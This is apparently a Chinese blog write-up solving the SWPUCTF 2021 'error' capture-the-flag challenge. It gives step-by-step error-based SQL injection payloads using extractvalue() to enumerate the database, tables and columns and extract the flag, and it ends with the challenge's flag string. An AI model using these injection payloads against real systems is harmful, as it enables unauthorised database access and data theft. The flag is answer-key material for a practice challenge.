Nssctf [SWPUCTF 2021 新生赛]error

合集 - NSSCTF诺赛斯(11)

1.[NSSCTF 2022 Spring Recruit]ezgame2024-08-152.NSSCTF [GXYCTF 2019]Ping Ping Ping2024-08-153.NSSCTF [SWPUCTF 2021 新生赛]hardrce2024-08-154.NSSCTF [SWPUCTF 2021 新生赛]easyupload3.02024-08-15

5.Nssctf [SWPUCTF 2021 新生赛]error2024-08-19

6.NSSCTF [SWPUCTF 2021 新生赛]pop2024-08-197.NSSCFT [SWPUCTF 2022 新生赛]ez_ez_php2024-08-208.NSSCTF [SWPUCTF 2021 新生赛]crypto82024-08-209.NSSCTF [HNCTF 2022 Week1]Interesting_include2024-08-2210.NSSCTF [鹤城杯 2021]EasyP2024-08-2211.NSSCTF [NISACTF 2022]babyserialize2024-08-27

收起

进入之后是一个搜索框，里面叫你传一个id值，先看一看网页代码，发现一端后端数据库代码，说明是报错注入

 

 

 extractValue()报错注入

先进行字段判断，使用 " 1' group by 1# " 来判断

1' group by 1#

正常回显

 出错回显

 说明有三个字段，接着进行数据库名的爆破

1' union select 1,extractvalue(1,concat('~',(select database()))),3#

 

 发现test_db，继续进行爆表

1' union select 1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))),3#

 

 出现test_tb,users表名，在test_tb表中继续进行爆字段名

1' union select 1,extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'))),3#

 

 发现flag，查看字段内容

1' and 1=extractvalue(1,concat('~',(select group_concat(id,'~',flag) from test_tb)))#

 

 

 

 

 ？怎么只有一半，是因为回显不够吗，那我们自己设定一个回显个数

1' and 1=extractvalue(1,concat('~',(select substring(group_concat(id,'~',flag),31,32) from test_tb)))#

 

因为我们第一次爆出的字段内容为30个，所以我们从第31个字段继续显示

 

 

 

 两段flag进行拼接就得到flag啦

NSSCTF{781ab938-3144-4bd4-962a-a3e32558afd5}